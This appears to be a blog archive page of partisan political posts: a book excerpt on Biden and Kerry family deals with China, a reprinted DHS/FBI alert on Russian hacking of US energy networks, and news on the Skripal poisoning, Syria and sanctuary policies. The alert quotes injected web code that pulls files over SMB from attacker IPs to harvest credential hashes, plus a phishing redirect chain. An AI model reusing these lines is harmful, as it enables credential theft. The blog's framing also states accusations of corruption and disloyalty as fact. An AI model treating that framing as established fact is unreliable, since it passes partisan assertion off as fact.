Keep this post in your bookmarks as we enter into the 2020 general election….
Primer:
1. China plants industrial espionage operatives in the U.S. that steal government contract secrets and sell them back to China. FBI caught at least one.
2. Through cyber espionage, China has stolen much of the F-35 technology, more than 50 terabytes.
3. John Kerry and Joe Biden did exactly the same thing as Hillary…sold access for money while exploiting it all as diplomatic missions with the title(s) of bi-lateral agreements.
4. Subpoena former Treasury Secretary Jack Lew and ask him about the CFIUS approvals of Chinese back enterprises. We may surely need to go back to former Treasury Secretary, Tim Geithner, did he set the table for all this with Obama’s approval creating that ‘Asia Pivot‘?
5. What does Congress know about foreign investments and when do they know it? They get reports, but who is asking questions, anyone?
NYP: Joe Biden and John Kerry have been pillars of the Washington establishment for more than 30 years. Biden is one of the most popular politicians in our nation’s capital.
His demeanor, sense of humor, and even his friendly gaffes have allowed him to form close relationships with both Democrats and Republicans. His public image is built around his “Lunch Bucket Joe” persona. As he reminds the American people on regular occasions, he has little wealth to show for his career, despite having reached the vice presidency.
One of his closest political allies in Washington is former senator and former Secretary of State John Kerry. “Lunch Bucket Joe” he ain’t; Kerry is more patrician than earthy. But the two men became close while serving for several decades together in the US Senate. The two “often talked on matters of foreign policy,” says Jules Witcover in his Biden biography.
So their sons going into business together in June 2009 was not exactly a bolt out of the blue.
But with whom their sons cut lucrative deals while the elder two were steering the ship of state is more of a surprise.
What Hunter Biden, the son of America’s vice president, and Christopher Heinz, the stepson of the chairman of the Senate Committee on Foreign Relations (later to be secretary of state), were creating was an international private equity firm. It was anchored by the Heinz family alternative investment fund, Rosemont Capital. The new firm would be populated by political loyalists and positioned to strike profitable deals overseas with foreign governments and officials with whom the US government was negotiating.
Hunter Biden, Vice President Joe Biden’s youngest son, had gone through a series of jobs since graduating from Yale Law School in 1996, including the hedge-fund business.
By the summer of 2009, the 39-year-old Hunter joined forces with the son of another powerful figure in American politics, Chris Heinz. Senator John Heinz of Pennsylvania had tragically died in a 1991 airplane crash when Chris was 18. Chris, his brothers, and his mother inherited a large chunk of the family’s vast ketchup fortune, including a network of investment funds and a Pennsylvania estate, among other properties. In May 1995, his mother, Teresa, married Senator John Kerry of Massachusetts. That same year, Chris graduated from Yale, and then went on to get his MBA from Harvard Business School.
Joining them in the Rosemont venture was Devon Archer, a longtime Heinz and Kerry friend.
The three friends established a series of related LLCs. The trunk of the tree was Rosemont Capital, the alternative investment fund of the Heinz Family Office. Rosemont Farm is the name of the Heinz family’s 90-acre estate outside Fox Chapel, Pennsylvania.
The small fund grew quickly. According to an email revealed as part of a Securities and Exchange Commission investigation, Rosemont described themselves as “a $2.4 billion private equity firm co-owned by Hunter Biden and Chris Heinz,” with Devon Archer as “Managing Partner.”
The partners attached several branches to the Rosemont Capital trunk, including Rosemont Seneca Partners, LLC, Rosemont Seneca Technology Partners, and Rosemont Realty.
Of the various deals in which these Rosemont entities were involved, one of the largest and most troubling concerns was Rosemont Seneca Partners.
Rather than set up shop in New York City, the financial capital of the world, Rosemont Seneca leased space in Washington, DC. They occupied an all-brick building on Wisconsin Avenue, the main thoroughfare of exclusive Georgetown. Their offices would be less than a mile from John and Teresa Kerry’s 23-room Georgetown mansion, and just two miles from both Joe Biden’s office in the White House and his residence at the Naval Observatory.
Over the next seven years, as both Joe Biden and John Kerry negotiated sensitive and high-stakes deals with foreign governments, Rosemont entities secured a series of exclusive deals often with those same foreign governments.
Some of the deals they secured may remain hidden. These Rosemont entities are, after all, within a private equity firm and as such are not required to report or disclose their financial dealings publicly.
Some of their transactions are nevertheless traceable by investigating world capital markets. A troubling pattern emerges from this research, showing how profitable deals were struck with foreign governments on the heels of crucial diplomatic missions carried out by their powerful fathers. Often those foreign entities gained favorable policy actions from the United States government just as the sons were securing favorable financial deals from those same entities.
Nowhere is that more true than in their commercial dealings with Chinese government-backed enterprises.
Rosemont Seneca joined forces in doing business in China with another politically connected consultancy called the Thornton Group. The Massachusetts-based firm is headed by James Bulger, the nephew of the notorious mob hitman James “Whitey” Bulger. Whitey was the leader of the Winter Hill Gang, part of the South Boston mafia. Under indictment for 19 murders, he disappeared. He was later arrested, tried, and convicted.
James Bulger’s father, Whitey’s younger brother, Billy Bulger, serves on the board of directors of the Thornton Group. He was the longtime leader of the Massachusetts state Senate and, with their long overlap by state and by party, a political ally of Massachusetts Senator John Kerry.
Less than a year after opening Rosemont Seneca’s doors, Hunter Biden and Devon Archer were in China, having secured access at the highest levels. Thornton Group’s account of the meeting on their Chinese-language website was telling: Chinese executives “extended their warm welcome” to the “Thornton Group, with its US partner Rosemont Seneca chairman Hunter Biden (second son of the now Vice President Joe Biden).”
The purpose of the meetings was to “explore the possibility of commercial cooperation and opportunity.” Curiously, details about the meeting do not appear on their English-language website.
Also, according to the Thornton Group, the three Americans met with the largest and most powerful government fund leaders in China — even though Rosemont was both new and small.
The timing of this meeting was also curious. It occurred just hours before Hunter Biden’s father, the vice president, met with Chinese President Hu in Washington as part of the Nuclear Security Summit.
There was a second known meeting with many of the same Chinese financial titans in Taiwan in May 2011. For a small firm like Rosemont Seneca with no track record, it was an impressive level of access to China’s largest financial players. And it was just two weeks after Joe Biden had opened up the US-China strategic dialogue with Chinese officials in Washington.
On one of the first days of December 2013, Hunter Biden was jetting across the Pacific Ocean aboard Air Force Two with his father and daughter Finnegan. The vice president was heading to Asia on an extended official trip. Tensions in the region were on the rise.
The American delegation was visiting Japan, China, and South Korea. But it was the visit to China that had the most potential to generate conflict and controversy. The Obama administration had instituted the “Asia Pivot” in its international strategy, shifting attention away from Europe and toward Asia, where China was flexing its muscles.
For Hunter Biden, the trip coincided with a major deal that Rosemont Seneca was striking with the state-owned Bank of China. From his perspective, the timing couldn’t have been better.
Vice President Biden, Hunter Biden and Finnegan arrived to a red carpet and a delegation of Chinese officials. Greeted by Chinese children carrying flowers, the delegation was then whisked to a meeting with Vice President Li Yuanchao and talks with President Xi Jinping.
Hunter and Finnegan Biden joined the vice president for tea with US Ambassador Gary Locke at the Liu Xian Guan Teahouse in the Dongcheng District in Beijing. Where Hunter Biden spent the rest of his time on the trip remains largely a mystery. There are actually more reports of his daughter Finnegan’s activities than his.
What was not reported was the deal that Hunter was securing. Rosemont Seneca Partners had been negotiating an exclusive deal with Chinese officials, which they signed approximately 10 days after Hunter visited China with his father. The most powerful financial institution in China, the government’s Bank of China, was setting up a joint venture with Rosemont Seneca.
The Bank of China is an enormously powerful financial institution. But the Bank of China is very different from the Bank of America. The Bank of China is government-owned, which means that its role as a bank blurs into its role as a tool of the government. The Bank of China provides capital for “China’s economic statecraft,” as scholar James Reilly puts it. Bank loans and deals often occur within the context of a government goal.
Rosemont Seneca and the Bank of China created a $1 billion investment fund called Bohai Harvest RST (BHR), a name that reflected who was involved. Bohai (or Bo Hai), the innermost gulf of the Yellow Sea, was a reference to the Chinese stake in the company. The “RS” referred to Rosemont Seneca. The “T” was Thornton.
The fund enjoyed an unusual and special status in China. BHR touted its “unique Sino-US shareholding structure” and “the global resources and network” that allowed it to secure investment “opportunities.” Funds were backed by the Chinese government.
In short, the Chinese government was literally funding a business that it co-owned along with the sons of two of America’s most powerful decision makers.
The partnership between American princelings and the Chinese government was just a beginning. The actual investment deals that this partnership made were even more problematic. Many of them would have serious national security implications for the United States.
In 2015, BHR joined forces with the automotive subsidiary of the Chinese state-owned military aviation contractor Aviation Industry Corporation of China (AVIC) to buy American “dual-use” parts manufacturer Henniges.
AVIC is a major military contractor in China. It operates “under the direct control of the State Council” and produces a wide array of fighter and bomber aircraft, transports, and drones — primarily designed to compete with the United States.
The company also has a long history of stealing Western technology and applying it to military systems. The year before BHR joined with AVIC, the Wall Street Journal reported that the aviation company had stolen technologies related to the US F-35 stealth fighter and incorporated them in their own stealth fighter, the J-31. AVIC has also been accused of stealing US drone systems and using them to produce their own.
In September 2015, when AVIC bought 51 percent of American precision-parts manufacturer Henniges, the other 49 percent was purchased by the Biden-and-Kerry-linked BHR.
Henniges is recognized as a world leader in anti-vibration technologies in the automotive industry and for its precise, state-of-the-art manufacturing capabilities. Anti-vibration technologies are considered “dual-use” because they can have a military application, according to both the State Department and Department of Commerce.
The technology is also on the restricted Commerce Control List used by the federal government to limit the exports of certain technologies. For that reason, the Henniges deal would require the approval of the Committee on Foreign Investment in the United States (CFIUS), which reviews sensitive business transactions that may have a national security implication.
According to BHR internal documents, the Henniges deal included “arduous and often-times challenging negotiations.” The CFIUS review in 2015 included representatives from numerous government agencies including John Kerry’s State Department.
The deal was approved in 2015.
Excerpted with permission from “Secret Empires: How the American Political Class Hides Corruption and Enriches Family and Friends,” by Peter Schweizer, published by Harper Collins. The book goes on sale March 20.
Category Archives: Failed foreign policy
CERT/FBI Declaration of Russia Hacking U.S. Infrastructure
US sanctions Russia for election interference, cyberattacks
The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”
CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”
The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.
The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.
“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”
The sanctions come after an investigation by the Department of Homeland Security and the FBI.
The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.
The Russian embassy didn’t respond to a request for comment.
‘A long-overdue step’
On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.
“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.
Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.
“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”
Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.
The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”
Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.
The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.
Systems Affected
- Domain Controllers
- File Servers
- Email Servers
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.
DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).
For a downloadable copy of IOC packages and associated files, see:
- TA18-074A_TLP_WHITE.csv
- TA18-074A_TLP_WHITE.stix.xml
- MIFR-10127623_TLP_WHITE.pdf
- MIFR-10127623_TLP_WHITE_stix.xml
- MIFR-10128327_TLP_WHITE.pdf
- MIFR-10128327_TLP_WHITE_stix.xml
- MIFR-10128336_TLP_WHITE.pdf
- MIFR-10128336_TLP_WHITE_stix.xml
- MIFR-10128830_TLP_WHITE.pdf
- MIFR-10128830_TLP_WHITE_stix.xml
- MIFR-10128883_TLP_WHITE.pdf
- MIFR-10128883_TLP_WHITE_stix.xml
- MIFR-10135300_TLP_WHITE.pdf
- MIFR-10135300_TLP_WHITE_stix.xml
Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
Description
Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)
This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”
Technical Details
The threat actors in this campaign employed a variety of TTPs, including
- spear-phishing emails (from compromised legitimate account),
- watering-hole domains,
- credential gathering,
- open-source and network reconnaissance,
- host-based exploitation, and
- targeting industrial control system (ICS) infrastructure.
Using Cyber Kill Chain for Analysis
DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.
Stage 1: Reconnaissance
The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.
Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.
Stage 2: Weaponization
Spear-Phishing Email TTPs
Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
Use of Watering Hole Domains
One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.
<img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;” /> |
In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:
var i = document.createElement(“img”);
i.src = “file[:]//184.154.150[.]66/ame_icon.png”; i.width = 3; i.height=2; |
Stage 3: Delivery
When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)
In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.
Stage 4: Exploitation
The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.
When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)
Stage 5: Installation
The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.
Establishing Local Accounts
The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.
Amb Haley Nails Russia over Poison Use in UK
The Russian delegation was sitting 3 chairs away from Ambassador Nikki Haley as she slammed Russia for their actions against Britain including the use of poison and the disdainful response by Putin towards Prime Minister Terresa May.
See the secret trial of the chemical weapon from Russia here.
As PM May expels almost 2 dozen Russian diplomats, actually they are spies, one wonders if Britain knew they were in country why they were not expelled previously. A theory has developed that Russian operatives applied the nerve agent, Novachok to the door handles of Skripal’s car. There was the case of the poison telephone:
Accounts of security deficiencies at weapons facilities indicate that, at least for a period in the 1990s, Moscow was not in firm control of its chemical weapons stockpiles or the people guarding them.
When Russian banking magnate Ivan Kivelidi and his secretary died in 1995 from organ failure after a military-grade poison was found on the telephone receiver of his Moscow office, an employee of a state chemical research institute confessed to having secretly supplied the toxin.
In a closed-door trial, Kivelidi’s business partner was convicted of poisoning Kivelidi over a dispute. At the trial, prosecutors said the business partner had obtained the poison, via several intermediaries, from Leonard Rink, an employee of a state chemical research institute known as GosNIIOKhT.
The same institute, according to Vil Mirzayanov, a Soviet chemical weapons scientist who later turned whistleblower, was part of the state chemical weapons programme and helped develop the “Novichok” family of nerve agents that Britain has said was responsible for poisoning Skripal. More here.
BRITAIN today ordered 23 Russian spooks to leave the country within a week in response to the spy poisoning scandal.
Theresa May told MPs that two dozen so-called diplomats who are in fact spies will be kicked out in a bid to stop Vladimir Putin meddling in Britain.
The PM said Russia had shown “contempt and defiance” in the aftermath of an attempt to kill ex-spy Sergei Skripal and warned that the poisoning represented “the unlawful use of force by Russia against the United Kingdom”.
She also confirmed that no ministers or members of the Royal Family will attend this summer’s World Cup in Russia – but stopped short of calling on the England team to pull out of the tournament.
Putin’s officials responded with fury, saying Britain’s tough response was “unacceptable, unjustified and shortsighted”.
But Jeremy Corbyn sparked anger when he suggested that Russia might NOT be behind the attack and compared the investigation to claims about Saddam Hussein’s WMDs.
Mrs May also announced this afternoon:
- New laws to help Britain defend itself from all forms of hostile Russian activity
- Flights and goods from Russia will face extra checks to stop ill-gotten gains entering the UK
- All planned talks with Russian officials, including a visit from the foreign minister, are cancelled
- Assets belonging to Putin’s government will be frozen to stop them being used for wrongdoing
- Suspected spies could be detained at Britain’s borders like terrorists under new powers
- The UK’s allies France, Germany and the US are in full support of her tough stance
The expulsion of 23 Russian spies is the toughest act of its kind for 30 years – and will almost certainly spark a tit-for-tat diplomatic war, with British diplomats likely to be kicked out of Moscow.
Mrs May told the House of Commons: “To those who seek to do us harm, our message is clear – you are not welcome here.”
Blasting Putin’s refusal to respond to her demand for an explanation, the PM said: “It was right to offer Russia the opportunity to provide an explanation.
“But their response has demonstrated complete disdain for the gravity of these events. They have provided no credible explanation that could suggest they lost control of their nerve agent.
“No explanation as to how this agent came to be used in the United Kingdom; no explanation as to why Russia has an undeclared chemical weapons programme in contravention of international law.
“Instead they have treated the use of a military grade nerve agent in Europe with sarcasm, contempt and defiance.
“There is no alternative conclusion other than that the Russian state was culpable for the attempted murder of Mr Skripal and his daughter – and for threatening the lives of other British citizens in Salisbury, including Detective Sergeant Nick Bailey.
“This represents an unlawful use of force by the Russian State against the United Kingdom.”
What we know so far:
- Theresa May announced she would kick out 23 diplomats in the wake of the Sergei Skripal case.
- The Russian Embassy has responded by calling the expulsion ‘unacceptable, unjustified and shortsighted’.
- The Prime Minister also confirmed government officials and members of the Royal family would not be attending the World Cup in Russia.
- Vladimir Putin ignored a deadline set by the PM to explain his involvement in the poisoning and instead warned Britain ‘not to threaten a nuclear power’.
- Skripal and daughter Yulia remain in a critical condition in hospital after being exposed to a nerve agent in Salisbury on March 4.
- The hunt for clues has now been extended 25 miles away to Gillingham, Dorset.
- Russian exiles have now been asked by cops to help identify a mystery couple aged between 35 and 40 seen close to Skripal and his daughter before they collapsed.
- Russian exile Nikolai Glushkov was discovered dead with ‘strangulation marks’ on his neck on Monday night by daughter Natalia Glushkova in New Malden, South West London.
- Anti-terror cops are investigating the 68-year-old’s ‘unexplained’ death because of the ‘associations’ he reportedly had.
Any Russian spies who try to re-enter Britain will now be stopped at the border in the same way as terror suspects, the PM said.
She announced that sanctions on human rights violators will be stepped up, and vowed to freeze the assets of the Russian regime if they are being used to meddle in the UK.
Mrs May added: “We will continue to bring all the capabilities of UK law enforcement to bear against serious criminals and corrupt elites. There is no place for these people – or their money – in our country.”
Foreign minister Sergei Lavrov, who was due to visit Britain shortly, has had his invitation withdrawn, she announced.
The PM said: “I continue to believe it is not in our national interest to break off all dialogue between the United Kingdom and the Russian Federation.
“But in the aftermath of this appalling act against our country, this relationship cannot be the same.”
And she warned Putin that Britain will not stand alone, revealing that Donald Trump, Emmanuel Macron and Angela Merkel have promised to present a united front against Russian atrocities.
But Jeremy Corbyn caused fury by immediately taking political potshots, as he brought up cuts to our diplomatic capability.
He also said he agreed with Russia that we should hand over a sample of the nerve agent used to them too.
The leftie Labour boss was heckled by Tory MPs as he suggested we should maintain a “robust dialogue” with Russia.
And he used his comments to snipe at Foreign Secretary Boris Johnson, saying he was “demeaning” his office.
Mrs May lashed out at Labour for refusing to join together with the Government in a time of national crisis.
“They could have taken the opportunity to condemn the culpability of the Russian state,” she stormed.
And Mr Corbyn’s own MPs joined the anger as they pledged support for the Prime Minister’s actions.
But some Labour supporters claim the attack on Mr Skripal was a “false flag” designed to damage the party leader, The Sun revealed today.
The Russian embassy in London responded to Mrs May’s statement with fury, saying: “We consider this hostile action as totally unacceptable, unjustified and shortsighted.
“All the responsibility for the deterioration of the Russia-UK relationship lies with the current political leadership of Britain.”
After today’s escalation of hostilities, Brits visiting Russia were warned they must avoid talking publically about politics in case they attract the regime’s attention.
The Foreign Office updated its travel advice for the country, telling tourists they could face “anti-British sentiment or harassment”.
Officials added: “You’re advised to remain vigilant, avoid any protests or demonstrations and avoid commenting publically on political developments.”
The Russian regime has refused to explain its role in the attempted hit – saying it will take at least ten days to respond to the PM’s ultimatum.
And ambassador Alexander Yakovenko went further today, saying: “Everything done today is absolutely unacceptable and we consider this a provocation.
“The UK should follow international law. They have to present the request to the organisation and we are happy to consider this within the ten days.
“We believe this is a very serious provocation and of course we are not ready to talk.”
It has emerged that police are looking for a mysterious couple who may be witnesses to the attack on Mr Skripal and his daughter while the investigation has widened from Salisbury to Gillingham.
The PM set Russia a deadline of midnight last night to explain how nerve agent novichok came to be used in the brazen attack – but the regime responded by taunting Britain and boasting about its nuclear arsenal.
Mrs May held a meeting of the National Security Council this morning, before returning to the Commons to outline the next steps in the campaign to punish Russia for the assassination attempt.
Britain has also called for an emergency meeting of the UN Security Council in a bid to hold the regime to account, while the UK’s Nato allies pledged to stand firm alongside us.
This morning Sergei Lavrov, the Russian foreign minister, made the bizarre claim that Russia hasn’t actually received a formal request for information from the UK.
He said Putin’s government would take ten days to respond once the official message is received.
When Napalm, Christian Persecution and Genocide are Ignored
There are several human rights groups operating in the Middle East reporting on civil war and military conflict casualties. Yes, the United Nations is reporting also, including being in theater…but reporting is just reporting while people die, become sick and are displaced such as living under ground for safety as best they can.
The Violations Documentation Center in Syria has filed with evidence to the United Nations Security Council that 59 reports of napalm attacks by the Syrian government and Russian forces, resulting in 6 fatalities. Yes….NAPALM
US Defence Secretary Jim Mattis has warned Syria it would be “very unwise” to use poison gas in Eastern Ghouta amid reports of chlorine attacks.
Mr Mattis did not say President Trump would take military action, but the US struck Syria last April after a suspected gas attack in northern Syria.
Fierce fighting is continuing and the Syrian army says it has surrounded a major town in the rebel-held enclave.
More than 1,000 civilians have been reported killed in recent weeks.
The Syrian military has been accused of targeting civilians, but it says it is trying to liberate the region – the last major opposition stronghold near the capital Damscus – from those it terms terrorists.
The statistical report on deaths and casualties in Syria up to February 2018 is here.
Newsweek reports Christian deaths this way:
The persecution and genocide of Christians across the world is worse today “than at any time in history,” and Western governments are failing to stop it, a report from a Catholic organization said.
The study by Aid to the Church in Need said the treatment of Christians has worsened substantially in the past two years compared with the two years prior, and has grown more violent than any other period in modern times.
“Not only are Christians more persecuted than any other faith group, but ever-increasing numbers are experiencing the very worst forms of persecution,” the report said.
The report examined the plight of Christians in China, Egypt, Eritrea, India, Iran, Iraq, Nigeria, North Korea, Pakistan, Saudi Arabia, Sudan, Syria and Turkey over the period lasting from 2015 until 2017. The research showed that in that time, Christians suffered crimes against humanity, and some were hanged or crucified. The report found that Saudi Arabia was the only country where the situation for Christians did not get worse, and that was only because the situation couldn’t get any worse than it already was.
The authors criticized the administration of President Donald Trump for not holding Saudi Arabia accountable for its human rights violations and instead focusing on the trade relationship between the two nations. In May 2017, Trump signed a $110 billion arms deal with Saudi Arabia during his first overseas trip in office.
The report put special focus on Middle Eastern countries like Iraq and Syria, where the authors argued Christians would have been entirely wiped out if it weren’t for military action and the assistance of Christian humanitarian organizations, like Aid to the Church in Need.
“The defeat of Daesh [the Islamic State militant group] and other Islamists in major strongholds of the Middle East offers the last hope of recovery for Christian groups threatened with extinction,” the report found. “Many would not survive another similar violent attack.”
The report, which was released in November 2017 but received renewed attention this week, is based on research in the countries and testimony from victims. It detailed attacks against Coptic Christians in Egypt and monasteries burned in Syria.
In Africa, the report focused on countries like Sudan, where the government ordered that churches be destroyed, and Nigeria, where ISIS-affiliated groups like Boko Haram have led a surge in attacks on Christians. In Eritrea, hundreds of Christians have been rounded up and imprisoned over the past year because of their faith.
The report also documented numerous case studies in which Christians in countries such as India and Nigeria were murdered or beaten for practicing their faith.
“A Christian pastor in India was left in a coma after being beaten in a ‘planned’ attack apparently carried out by Hindutva extremists,” the report noted. “Before slipping into unconsciousness, the pastor told police that the attack was religiously motivated.”
“You must never come to our village to pray. You should never enter our village,” the men told the pastor, according to the report.
In late October, Vice President Mike Pence pledged that the Trump administration would redirect aid money formerly given to the United Nations to the U.S. Agency for International Development, a move that was meant to appease Christian organizations that say the U.N. isn’t doing enough for persecuted Christians.
When Governors, Mayors and Congress Register as Foreign Agents
It is a matter of law….the democrats and some republicans are providing higher protection for illegals and criminals than they do for just plain ol’ Americans. At least they should be forced to register or something similar like a declaration that they are more loyal to illegals and criminal action than they are to Americas.
Some democrats are posturing to abolish ICE as an agency.
The Democrats mulling a run for the White House in 2020 are facing intense pressure from liberals to campaign on abolishing the agency that enforces federal immigration laws, a proposal that was once relegated to the far-left fringe.
In protesting the Trump administration’s policies toward illegal immigration, liberal commentators and writers have been embracing the idea of gutting the U.S. Immigration and Customs Enforcement agency, which identifies, arrests and deports illegal immigrants inside the United States.
“This is a growing position on the left, and I imagine 2020 Democratic presidential aspirants will have to grapple with it,” liberal writer and MSNBC host Chris Hayes tweeted.
We have seen California become a sanctuary state and now Illinois is too. We have seen mayors refuse to cooperate with ICE supported by their governors. Can states refuse to cooperate with ICE or how about other Federal agencies like ATF or DEA?
As long as these politicians provide legal cover and sanctuary for foreign criminals they should all be registered as ‘foreign agents’ under the FARA.
The Foreign Agents Registration Act (FARA) was enacted in 1938. FARA is a disclosure statute that requires persons acting as agents of foreign principals in a political or quasi-political capacity to make periodic public disclosure of their relationship with the foreign principal, as well as activities, receipts and disbursements in support of those activities. Disclosure of the required information facilitates evaluation by the government and the American people of the statements and activities of such persons in light of their function as foreign agents. The FARA Registration Unit of the Counterintelligence and Export Control Section (CES) in the National Security Division (NSD) is responsible for the administration and enforcement of the Act.
We have a missing illegal criminal from Denver that is part of a case of vehicular homicide….Denver law enforcement let him go under bail even though ICE had a detainer on him….he cannot be found.
Meanwhile, let us look at Illinois shall we?
Illinois Gov. Bruce Rauner smiles while surrounded by law enforcement officials and immigrant rights activists in Chicago’s Little Village neighborhood Monday, Aug. 28, 2017, after signing legislation that will limit how local and state police can cooperate with federal immigration authorities. The narrow measure prohibits police from searching, arresting or detaining someone solely because of immigration status, or because of so-called federal immigration detainers. AP (Ashlee Rezin /)
